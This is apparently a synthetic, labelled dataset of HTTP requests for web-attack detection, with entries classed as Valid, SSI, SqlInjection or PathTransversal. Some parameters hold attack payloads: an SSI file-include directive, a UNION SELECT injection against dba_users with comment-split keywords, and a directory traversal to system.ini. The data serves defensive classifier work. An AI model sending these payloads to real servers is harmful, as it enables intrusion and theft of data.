Client-ip: 32.241.7.95
Cookie: eUZe-MUHNK=8781617;ebui=0ayohn)taiframe;otns6t=4;af6a5anATq4e=116888
Cookie2: $Version="184"
Date: Mon, 24 Mar 08 06:44:42 UTC
If-Modified-Since: Sun, 07 Mar 10 13:47:35 CET
If-Match: "YcU3ozozW9K_4ApZ1Q5B"
If-None-Match: "mKjL9p1@ZuFMC9fK"
If-Range: "ZJUnguGy4DLc283OhlNn"
Pragma: no-cache
Proxy-Authorization: Basic c2VpaDdmOnNTYTNubXph
Authorization: Basic aWZhRURpZE06cHltdWFzbWU=
Range: 2596-
Referer: /DehD/upap4eni/trem.gif
User-Agent: Mozilla/0.7 (compatible; MSIE 5.3; Open BSD i386; seaoid; a4ss; abtcn)
UA-OS: Windows NT
X-Forwarded-For: 112.242.208.185

null

End - Id: 40345
Start - Id: 39281
class: SSI
GET /iUenO1/i7FOd6_WxPjc/enF@Ap-1cdogk/Enx8Yr/UiC.b/nssRown0r8S/ul-.pVA_cw35hK9sNPn/3yG5Dk5lel_0r_gHPl/Nunion3Lrfd/hhejo/ls1c5srewtsL7g.php4?dnesb=8Don&uipe=1451&ixMO4envittbnS=itd6+ht%7E&roMrjeeo=bn%5C&OynrlgceRSoCa=7355470&DsVPO53K=74980164&lglinkLDh=npslm&mhneneewt=jo&7etao=mochas&3wehEm=arre&tloowrirsyr1i=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&aYriyRemsOnfga=092535 HTTP/1.1
Host: 198.195.115.205:46
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: e-wlent;q=0.1, 9nl1mdno-pnn, aae-e;q=0.2, d-g
Cache-Control: min-fresh=70535
Client-ip: 178.60.27.113
Cookie: ol=8e
Cookie2: $Version="22"
Date: Thu, 09 Feb 06 23:47:27 CET
ETag: W/"v-YIcLdV9XLjfGY"
Expect: 100-continue
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 18 Sep 07 18:48:48 CET
If-Unmodified-Since: Sun, 29 Nov 09 22:40:49 UTC
If-Match: "LNa1AR5Wnc_yTtcdoE9"
If-None-Match: *
If-Range: Thu, 04 Mar 04 02:49:47 GMT
Max-Forwards: 2
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: Basic ZXVlZTQ6dG9oU2w=
Range: 3-
Referer: /if3heo4e/adslqiti/oonFWT/mcGoemzu.tar.gz
TE: trailers
Trailer: Via
User-Agent: bym1urzeiu
UA-CPU: MIPS
UA-Disp: 844,3342,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 320x017
Via: FTP/9.9 www.neel.jpeg
Transfer-Encoding: tooar; ho4otdf=ihrn
Upgrade: tfe/7.8, osw/0.1, o7E/9.0, t4ii/3.0
Warning: 372 www.exhwh.jpeg "h0t3bfwddlgralo9" "Thu, 10 Jun 04 17:14:38 UTC"
X-Forwarded-For: 190.235.131.102
X-Serial-Number: 420641623640
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39281
Start - Id: 26004
class: Valid
GET /o5IqRV.nsf?xetVti=biu8Pblt%27e%28&ebohahcvCnmqhf=191&dtqoeefbgvu=4737715&O7palcrieufe=4a&leic5sc5chRaH8w=3630304&eeecrtphnt=fN%40G%40FX7&aChhrnhc=0 HTTP/1.0
Host: www.ctyr0L.gov:7213
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: h-uriO, ejnq9e-c9s;q=0.6, Oyrioxa-o;q=0.8, sRemb-en2a;q=0.8, jN-erntZkn
Cache-Control: min-fresh=3414
Client-ip: 254.230.111.50
Cookie: no=cT6TTlhuGeaie;ljDEyIvq-or=i;RbWJ=hHvDSjpHgA;pewdeT=4
Cookie2: $Version="31"
Date: Fri, 08 Jan 10 14:39:22 GMT
ETag: W/"ANnuE.x-5w6Q52AxA"
Expect: hmrtyoF
From: okoN@InehtR.st
If-Modified-Since: Thu, 08 Oct 09 04:04:43 UTC
If-Unmodified-Since: Tue, 18 Jul 06 17:55:07 UTC
If-Match: "zFxJ82Pf17u2bPPP"
If-None-Match: *
If-Range: Fri, 28 Dec 07 02:27:45 GMT
Max-Forwards: 144
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic dHVhZHg6aEhFenJuZA==
Authorization: Digest username="8stk"
Range: -22228,15-
Referer: /et5ptNrl.msf
TE: trailers
Trailer: Expect
User-Agent: eV-2_A http://www.umino2pe.uk
UA-CPU: Sparc
UA-Disp: 3085,3643,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8535x949
Via: 5.3 www.tniil.gif, eotp/7.7 www.geaN.png
Transfer-Encoding: gzip
Upgrade: yuk/5.7, RisS/8.9
Warning: 488 www.avaeexA.js:6581 "ocetwnostmfR" "Thu, 04 Oct 07 11:18:19 CET"
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 767328268470976687
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26004
Start - Id: 3067
class: Valid
GET /Erat00snfnuean/6IapphptL1fLv/nWtCedN5Xs5JCMm9cc/leahrnual.php?sc2eyyhmlet=econnecttmpf&ul01=1529197&dretonwqrsr99=eglnwhtpassseat1pneWauvt%24&tldenmeea8a7=747 HTTP/1.0
Host: www.9jtiiC.uk:46919
Connection: close
Accept: image/*, application/*;q=0.4
Accept-Charset: windows-1253;q=0.1, x-mac-icelandic;q=0.9, x-mac-turkish;q=0.5, iso-2022-jp;q=0.5, windows-1253
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=56
Client-ip: 203.1.184.86
Cookie: gu=eRnJ;h7er1aoCmNzuo=777817;betcKxf29A.=4<3mwb=a;lTmsedet= ;qx1-Q@.=h
Cookie2: $Version="22"
Date: Mon, 19 Nov 07 10:18:27 GMT
ETag: "L8zPejW4qcs5OUwj"
Expect: 100-continue
From: aCahNpEs@etrihpeiit.de
If-Modified-Since: Sun, 23 Dec 07 22:19:14 UTC
If-Unmodified-Since: Sun, 21 Jun 09 18:39:42 UTC
If-Match: "bsiwqUl_M4HkbM@p7_"
If-None-Match: *
If-Range: "7WUDosanhQuXoeyFZZ"
Max-Forwards: 312
MIME-Version: 8.9
Pragma: mnt4e=erun
Proxy-Authorization: Digest uri=http://www.i1os.gov/snticue/o7oas/eeeoqf/lala.gif
Authorization: Digest username="plalonr"
Range: 7328-03,-9
Referer: /tsqhdu/dieiB.gif
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/6.9 (Windows; U; WinNT 7.4; af-Er; rv:7.2.9) Gecko/79858740
UA-CPU: Sparc
UA-Disp: 6710,9525,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9081x8193
Via: aNMsed/0.6 www.selm.jpg, 3.7 www.twzBta.png
Transfer-Encoding: identity
Upgrade: TyHs9i/8.3, tlee/0.2, 3Drt/8.0, nnuEe3/5.2
Warning: 569 www.oeereniu.htm:0303 "atsetrg" "Wed, 17 May 06 18:16:08 CET"
X-Forwarded-For: 54.60.0.87
X-Serial-Number: 79351042472156559
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3067
Start - Id: 23326
class: Valid
GET /Q7Y./ecmlssnaedr/njrer9ptigreA.html?Sb4tHia=e1BY HTTP/1.0
Host: www.sdbrUyt.org
Connection: keep-alive
Accept: audio/x-wav;q=0.6, video/quicktime, text/*
Accept-Charset: koi8-r, x-mac-hebrew, iso-8859-5;q=0.0, gb2312, windows-1254;q=0.4
Accept-Encoding: 
Accept-Language: len-yMhyeg
Cache-Control: 6i='nlgothn6'
Client-ip: 162.60.4.39
Cookie: ees=35;ahQAKJ=igetr;edib4=oar vxml0;6nerelha=n;nmailIHpMZ9V=a;45JPN5.OEd=i
Cookie2: $Version="186"
Date: Sun, 28 Mar 04 17:45:37 UTC
ETag: W/"ynrqS@txFebq1J5v8"
Expect: 100-continue
From: nj1rhh3i@oh7torqhee.uk
If-Modified-Since: Thu, 15 May 08 19:19:00 GMT
If-Unmodified-Since: Tue, 21 Feb 06 13:55:02 CET
If-Match: *
If-None-Match: "hKQDb@EQWAHcc3Eo6JR"
If-Range: Sun, 07 May 06 14:09:35 GMT
Max-Forwards: 754
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: Digest uri=/hbeyned/2frRo/tipxd4e/nntAe.nsf
Range: 56641-,-4,2-
Referer: http://www.5nnncae.st/aaha/8cieg/lzebwt6i/Idn53ua.tiff
TE: deflate,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 5.7; nr-oh; rv:5.0.9) Gecko/70561453
UA-CPU: 68000
UA-Disp: 295,003,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 229x4077
Via: 0.1 68.222.62.88:4
Transfer-Encoding: identity
Upgrade: eeer/9.5, ezn/0.2, eeM/5.1, hiAKQE/1.2
Warning: 614 www.eyqtEs.shtml "o4SsAiadTpu" "Mon, 26 Jul 04 10:18:10 GMT"
X-Forwarded-For: 18.106.251.115
X-Serial-Number: 22361064185048
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23326
Start - Id: 11895
class: Valid
GET /aRhjVWHYB5Q_e3bWL6/uNH9.png? HTTP/1.0
Host: 185.173.97.145:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 7xseoi9a-aeasb, g5eyr6B-myN;q=0.0, mtjrotu-ootu;q=0.5
Cache-Control: 9edr=OY
Client-ip: 8.113.175.85
Cookie: vxe=06570;aojIDMcvF9=ndafetancolmsdd;-70Ggbody3eVd=071834850;I0uR1le4=54
Cookie2: $Version="556"
Date: Thu, 10 Sep 09 09:48:02 CET
ETag: W/"Xeo@EaWGnDsJT@6"
Expect: 100-continue
From: kleo3oo@trr3heero2.cz
If-Modified-Since: Wed, 11 Oct 06 06:53:23 UTC
If-Unmodified-Since: Thu, 31 Jul 08 04:41:06 GMT
If-Match: *
If-None-Match: *
If-Range: "cGb5T7wbkQT6fLN"
Max-Forwards: 50
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: emel oohcn=ey9uap
Range: 477-56
Referer: http://yapne.fr/9e9Y/5Ssnet8y.jsp
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/3.1 (compatible; Konqueror/8.1; Open BSD i586; kst5udu; yr7ecEeer; yxTU)
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 151x6583
Via: 6.0 www.isN9kuh.tiff, 3.9 www.eqdpUpr.png
Transfer-Encoding: deflate
Upgrade: Ijh/8.0
Warning: 032 www.ca9a6wh.png "rnn53ecqdgOmY0eteI" 
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11895
Start - Id: 41946
class: SqlInjection
GET /oR@VdM-wNE9Y9S/rh5drz8Hs/fijwnnphrlybTni3L/sIL/yMMbOUr9-w9zfkG/4T2fmjYQftkt8/mU-y/iID721IVf3LN5PmD5iSV/essDfnetn5uthds/p7EqFHWOXt1o@I-S_n.css?CVJM_Gexecwindow.openbeU=34&hrs0c1jdeTnr0y=%3Dtaeie%26+e%28etdbllo&qK-oxPX=e%5D&XGBn9=dqJkc&srnRcniooi=paTaj1q7&xt2tetg=aj_DT2AfNS&2nvqoe0wc9=%40&Q9FAmebYB-@=chairs%27+++UN%2F**%2FION++++SEL%2F**%2FECT++++szie+++++FROM++dba_users+WHERE++++uai++++like++++%27%2525&okbrrnnaitl=doeScr3rfadzz5i&3sernHuur=8190&etdst3p=srQ0lmfl9&n2sSe62oo=43 HTTP/1.0
Host: www.rhriuv.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 228.114.106.80
Cookie: 6mrmSri=libmyeUo2tl3n=whereqhobjectm
Cookie2: $Version="26"
Date: Mon, 02 Nov 09 08:05:16 GMT
ETag: W/"-ASILb_HXgt9Qe_N"
Expect: aeeedy
From: LtoaiMii@xdfo4enhse.be
If-Modified-Since: Tue, 13 Mar 07 17:49:21 GMT
If-Unmodified-Since: Fri, 04 Jan 08 13:50:43 UTC
If-Match: *
If-None-Match: "a6syYAo@f@MyVGOg"
If-Range: *
Max-Forwards: 556
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: aies sesl=fkaciu
Authorization: ltg0u zeLs=HjccvX
Range: 55660-
Referer: /Ymtzh/ieete/enSrl.gif
TE: trailers,trailers,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.3 (compatible; Konqueror/1.8; Linux i586; er6cpaNpR; eltnma)
UA-CPU: x86
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x2725
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: oaio4
Upgrade: imn/2.9
Warning: 021 www.mcyot.gif "hrtenvrrnpri" 
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 41242078999326437
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41946
Start - Id: 14188
class: Valid
GET /ophre/it3mbs/sVAOkuS2UVzjo8t/4mbrka7yreneo/ttsrnanzeahhday/5Z_R/l20uHM-Nj5_8xg/ieivpefeevat3aTnttj/2jOYLUn.SE7Yi/sU5z8UscriptxV/s32En0rnru4bs2ltn.cgi?sle2d=349310&dES=aabea&naIaYrnrhul=acceptG+dgea&xandIF=%2F%3Fs&tyleCsaagsr1=12717&dckrahIdheea7=44322&9heMBU=51974&stiquinr=u8LjQAr_ZEwq&soadpbgYon=hts&ic=175 HTTP/1.0
Host: 222.136.30.118:3856
Connection: keep-alive
Accept: audio/basic, text/*;q=0.0, image/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: hue-qdh, ndoksu-udosht, ttoine-tlerna, h5Arueht-tem6svs;q=0.5, t5aHat1e-a1t7Ec
Cache-Control: no-store
Client-ip: 173.105.91.45
Cookie: reotEet=06;NAdVn2Qadminzlq=dpma9f6;kah9=evalshutdown
Cookie2: $Version="3"
Date: Tue, 21 Jul 09 04:26:37 CET
ETag: W/"4NLlfD4pzobhFKPg"
Expect: 100-continue
From: wsyn@xHfoxPi.it
If-Modified-Since: Sat, 25 Apr 09 18:52:04 UTC
If-Unmodified-Since: Sat, 12 Sep 09 04:26:58 GMT
If-Match: *
If-None-Match: "bU7BuD6bF4PEfXZLF"
If-Range: *
Max-Forwards: 4091
MIME-Version: 8.0
Pragma: iotaxh42=y48A
Proxy-Authorization: eets 3cgniiel=mreanh
Authorization: NTLM dGFlZnQzY3RpcmNpb3RwaXROZWUySDZhbG9taHdydGQ0dFJoNEc0aGUw
Range: -96950
Referer: /nidtDf/hv9jl.msf
TE: trailers,trailers,deflate
Trailer: If-Modified-Since
User-Agent: niddRdl10d/2.9.7
UA-CPU: x86
UA-Disp: 9830,719,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3581x504
Via: HTTP/6.8 148.81.3.22
Transfer-Encoding: identity
Upgrade: lahia/9.9, khro/5.9, cn6rl/8.9, Leuecl/0.7
Warning: 607 145.140.108.102 "1uaqkehhratt5eDyite" 
X-Forwarded-For: 78.119.180.100
X-Serial-Number: 983815591636299863
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14188
Start - Id: 40458
class: SSI
GET /tuhlIboktn0/17n2rbETaee.js?tIy5EoucEsRitr=trdt&dmC7LX@Y=ellspkz&dIoA-ORFM=isktFIPne67ks&PwrnhaexS=e0in&eras=rfio74hnoytoertrRt&DSHdivuz=%3C%21--++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E&Ik9YHzGm=922565&DefSi=zo&raistgtR8lkG=7&mzaDr2oadho3S=358706&xsdrrn=38923227 HTTP/1.1
Host: 79.110.166.25
Connection: keep-alive
Accept: application/postscript, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.1, compress;q=0.6, gzip;q=0.2
Accept-Language: nr-ezcl
Cache-Control: max-stale=20
Client-ip: 10.105.98.174
Cookie: li4nSw=stgy
Cookie2: $Version="974"
Date: Sat, 19 Mar 05 18:39:45 GMT
ETag: "O3@CglAIMA5W.RP."
Expect: 100-continue
If-Modified-Since: Sun, 25 Mar 07 20:03:14 CET
If-Unmodified-Since: Thu, 17 Jun 04 20:33:56 GMT
If-Match: *
If-None-Match: "N88kgKQTqpMk_MXbL"
If-Range: Sat, 02 Jan 10 14:06:08 GMT
Max-Forwards: 7871
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM aDJydHRpRXdxdEhsZXhiaXM5dHRhOWJwc2U1aWxhcm1wbnlvdWM=
Authorization: Digest algorithm=MD5
Range: 688-12571,5864-06540,0825-1066
Referer: http://2AgeQl.cz/smdozu/0Hwspu/pd5nptDe.msf
TE: deflate,trailers
Trailer: If-Match
User-Agent: dsEGd/1.7.0.4.2
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 025x185
Via: 4.2 www.gcp1fo0.htm
Transfer-Encoding: compress
Upgrade: ytiE/1.4
Warning: 218 www.tisoHb.htm "wmoeMido5" "Sun, 29 Feb 04 21:33:45 CET"
X-Forwarded-For: 109.247.28.154
X-Serial-Number: 98565372421828
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40458
Start - Id: 45810
class: PathTransversal
GET /eny6oige0xsiUs8TnbD/RuUb8eHEMvSandk/neidoow08nb8eon.nsf?ra5ssl0rtCsi=%7Ch&ne2=yuehg0&aiswiuejltwas14=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&gcorrwrd=787567724 HTTP/1.1
Host: 26.144.73.50
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-10646-ucs-2, isiri-3342, iso-8859-3
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 241.101.131.168
Cookie: 9et=871;ulmie0nr=t5hY
Cookie2: $Version="085"
Date: Mon, 18 Aug 08 06:43:42 GMT
ETag: "RXzBxEUPj84ka@n1rH"
Expect: 100-continue
From: heorumd@haetagnn.uk
If-Modified-Since: Fri, 26 Dec 08 22:37:09 UTC
If-Unmodified-Since: Sat, 30 Jan 10 21:02:28 CET
If-Match: *
If-None-Match: "la8MYH_M63Ew4HEX"
If-Range: Thu, 13 Mar 08 24:28:32 GMT
Max-Forwards: 6
MIME-Version: 4.8
Pragma: tiyrnu='ee8cq'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Basic bnQ0bTU6ZWlzb2g2bg==
Range: 10-894039
Referer: /vUerHze/razde2o/pevTowad.conf
TE: trailers,deflate;q=0.6
Trailer: Authorization
User-Agent: Mozilla/6.4 (compatible; Konqueror/6.5; Windows NT; anoeUsttn; elag)
UA-CPU: PowerPC
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9422x259
Via: ussvgh/2.9 www.fMp7me.css
Transfer-Encoding: compress
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 20.38.1.164
X-Serial-Number: 97437776345
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45810
Start - Id: 27147
class: Valid
GET /reX./tidDlbetylE/aaO@SV_wOK./heYyeid/c8aPG3s/hryat/oeajd4Ts/sdxlzUMFtN/tm.sw/eaZf8/ogmeu8w3TeuunSgstc.png?slueEEiseon=10179319&n1t8Oldlhrr=tt7miysdmw&tI=itt&rsdleduutruA=ekX2&etw=028278821&oyntl23rcwpgdt=7 HTTP/1.1
Host: 116.82.95.21
Connection: close
Accept: image/*, image/gif;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 198.90.183.128
Cookie: renceabhtrecl=niE8Twioocsfdnd;BkJW7nQIA=scdnisjg6;T3i=t:e;ite3nhH=vn0;nEhsns0n7A=0779231;tast9rRE=52996
Cookie2: $Version="9"
Date: Fri, 16 Sep 05 10:08:35 GMT
ETag: "EqroVsI170GggWVYKj"
Expect: 100-continue
From: tiqc@jnte.gov
If-Modified-Since: Sat, 26 Jul 08 06:45:50 UTC
If-Unmodified-Since: Sat, 26 Mar 05 04:56:11 CET
If-Match: "tTePC_n2GibXNaxxYTbW"
If-None-Match: *
If-Range: "C_NGDVAJloL6ey5p"
Max-Forwards: 57
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest username="eiadaa"
Authorization: Sgat7y yhhm=tneslp
Range: 876-071,453044-67,-1
Referer: http://www.eta2.de/kudtrEp/iAnSenet/ear0sF.doc
TE: gzip,trailers
Trailer: Accept
User-Agent: Mozilla/0.5 (compatible; fmOsetwi; Unix; 0rh6dnnr; Hrzcbtcaba; ioia)
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 549x140
Via: 5.6 www.tsodn.jpeg, HTTP/9.8 www.ehemwim.tiff, HTTP/6.2 www.xyte.shtml
Transfer-Encoding: identity
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 27147
Start - Id: 28465
class: Valid
GET /fphrnhrhewNtheNs/dlosrhombo9pxlotln3i/gsta6.jpg? HTTP/1.0
Host: www.3eeoupee.de
Connection: psEaons
Accept: audio/basic;q=0.2, video/*, application/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 13.231.123.77
Cookie: ttPElrepwi67=47755594;a-m4C7HlIltF=911078
Cookie2: $Version="0"
Date: Tue, 15 Sep 09 07:23:17 UTC
ETag: "FtQPPMZUZcIvhY9I6XA-"
Expect: 100-continue
From: zneku@9etnnTes8.it
If-Modified-Since: Sun, 28 Feb 10 24:09:06 UTC
If-Unmodified-Since: Tue, 06 Jun 06 07:58:09 UTC
If-Match: "0dvFs-Ghvclb9w1UWz"
If-None-Match: *
If-Range: *
Max-Forwards: 17
MIME-Version: 0.3
Pragma: m='Eheedrr'
Proxy-Authorization: NTLM Q2xpdG5OcGhqaHVucWFoZmhlcmZOZ2UyZUhiZ2FwaWEwdXNBc29l
Authorization: Basic bGhvaWVlOm50b2Vhc3I=
Range: 51205-,399-
Referer: /ga9gMm/r9es/eent6u/Sxugnf8/sahspxs6.msf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.7 (X11; U; Linux i386 1.1; ue-tH; rv:1.4.7) Gecko/51373384
UA-CPU: 68000
UA-Disp: 0681,480,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 686x883
Via: 4.4 127.244.45.251:79, 4.3 202.150.245.130, 3.5 www.senRy.css
Transfer-Encoding: compress
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 717 213.77.249.79 "ztr6oRnm" 
X-Forwarded-For: 7.240.245.49
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 28465
Start - Id: 26125
class: Valid
GET /Ray/.vupdateZ/8F-uLN/fDmochaftpacceptnph-zIYWOgescriptS/7PHq45ix1RI/aB3kprROTEhk_hKd/reo50eeteeeI8mrceOt/wOVk5TLJPAd/5mBg/CMNgTT24bhiT/zedrrbhnYemEhi/hGhJeC-_ak5@.nsf?.NcNsYCwindow.opencopyK=0neEdomVsduoiyir&2ten2PeFtbos3=685702018&st=uYd6%40c&Ho1sedS=fEztgNpa HTTP/1.0
Host: www.torqrOne.st
Connection: close
Accept: text/*;q=0.6, text/html;q=0.7, audio/*
Accept-Charset: euc-kr;q=0.7, x-mac-arabic;q=0.3, iso-2022-kr, windows-1252
Accept-Encoding: 
Accept-Language: Cbn-ngnbtpn;q=0.4, s-n
Cache-Control: min-fresh=34988
Client-ip: 17.252.225.48
Cookie: toeuhla7ht=44056571;.bBOtmp=el Fleopenn;IsOgI-m0Y=S2;tdtowuRy=esm;raeruwOsMc8p6=ti0neW
Cookie2: $Version="23"
Date: Mon, 03 Nov 08 24:59:10 CET
ETag: W/"_Hoe4u81Pkw7Zoq3BCsA"
Expect: 100-continue
From: xeno@faL1.st
If-Modified-Since: Fri, 06 May 05 12:37:40 UTC
If-Unmodified-Since: Wed, 04 Jul 07 24:25:00 UTC
If-Match: "3Lrl3STN9a42BwOxwf7"
If-None-Match: "QA6lFv-ZvwWc2JZs"
If-Range: Tue, 17 Nov 09 21:56:37 UTC
Max-Forwards: 3829
MIME-Version: 7.6
Pragma: cnoy='at'
Proxy-Authorization: Basic dGl2bzNpZmU6aXJlaGg=
Authorization: NTLM YnJyZmxhaGhud2N1c3NlZWlpMWZyZWV0aWVhZWh1czdhemUwc2Rwb2lvc0t3OGlh
Range: -076,520453-4710
Referer: /ttni/anSrksu/ecrnynez/alyyfw.bin
TE: chunked,chunked;q=0.2
Trailer: Warning
User-Agent: ifAsw3shudivrnm
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 619x684
Via: enbwe/7.0 127.51.172.26, bnnho6/5.5 www.Rcasl.css, FTP/8.9 238.123.137.27:9415
Transfer-Encoding: compress
Upgrade: ienpz/0.2, e5sdr7/6.1, eRota/7.0
Warning: 803 211.131.116.100 "tisise5eslK" "Tue, 29 Dec 09 16:59:21 UTC"
X-Forwarded-For: 38.148.116.46
X-Serial-Number: 6736217
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26125
Start - Id: 28099
class: Valid
GET /6tctOnnutee/eechnar/Txml5j9Vai@KMA/og78KZ85FDt/btmbeErp8qdenOynAp5/oKAWPeYFOZ42X7ro/stF4U2fumdrs0Nlog_/mpXo3TQ1p5/Tven/qJONU8iE2R@AIzS/jBf2/Z3jfP3.shtml?sc=9825921317&teIh=66&ti=reTwo2jca-un%3Bt HTTP/1.1
Host: www.elsEmpex69.gov
Connection: keep-alive
Accept: image/*, application/postscript;q=0.8, text/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: skhde-tthVw;q=0.3, veeee-i2tl, a5gosE-ee1;q=0.4, mtet-edrlcns
Cache-Control: no-store
Client-ip: 203.118.153.113
Cookie: oh5BCK5J=si5rehjxelarcnd;cfiis0idlHoqf=Cjsm na8nhiull;iylDws=ltf4Ciem2taoawnIEu;p0rn2ao=e9YwkLhR0v9M;u1acOneihi=9;oaeomgbroi=eehaxmlieaeael(t
Cookie2: $Version="6"
Date: Mon, 12 Oct 09 15:59:40 UTC
ETag: W/"XUfnP3E3zKGKY_kZ_"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Wed, 30 Jan 08 22:11:03 GMT
If-Unmodified-Since: Thu, 31 May 07 09:13:29 GMT
If-Match: "dNxnuhwx1NfcaI3"
If-None-Match: "JISRff.Ej.w9xlw"
If-Range: "eCbA25Hz6fuW2-lbWWL"
Max-Forwards: 46
MIME-Version: 2.1
Pragma: ccateiW0=7gsE6e
Proxy-Authorization: NTLM c2huT3NveW4xN2lnNm5yeW9qbDR0ZmV1QUhvcmxhZXR0b21hZA==
Authorization: Digest uri=/laoGsu.jpeg
Range: 432781-
Referer: http://www.tGlurtXa.st/osle/hOmf/iiet/egrbts/iyyue.gz
TE: deflate,chunked;q=0.6
Trailer: Accept-Charset
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 8.2; ho-N7; rv:0.0.4) Gecko/47747976
UA-CPU: MIPS
UA-Disp: 166,4722,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 630x5216
Via: HTTP/1.0 54.253.58.23, 8.7 186.82.248.119
Transfer-Encoding: eP1c
Upgrade: bdNih/1.1, xdHnh/3.6, htee/4.4, 6mIer/6.0
Warning: 810 www.cq0i.htm "twdSte9atJriluetrna" 
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 16577786400962
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28099
Start - Id: 21518
class: Valid
GET /ceaibiee/VLuIn/ndmtaeioswLsemyoea/iMxDm2o9kfPoKQW/eFDGPZoYeJW/Aa/3vXY-s/eVyDX/ttzkelrvpuAnm.exe?di9ihaxbuieo=access_logyrsers9alen%29+&e7oeenegiiTs=adrsabrtt+8smgl&olNnklP=1391&axwtrl=3rN5EXw7%40&cnkg=miT&zte6=eZO HTTP/1.1
Host: www.kyc7.org
Connection: tsdiesan
Accept: application/*;q=0.0
Accept-Charset: iso-10646-ucs-2;q=0.4, windows-1255;q=0.6, iso-8859-3, windows-1251
Accept-Encoding: identity;q=0.9, gzip, identity;q=0.6, compress
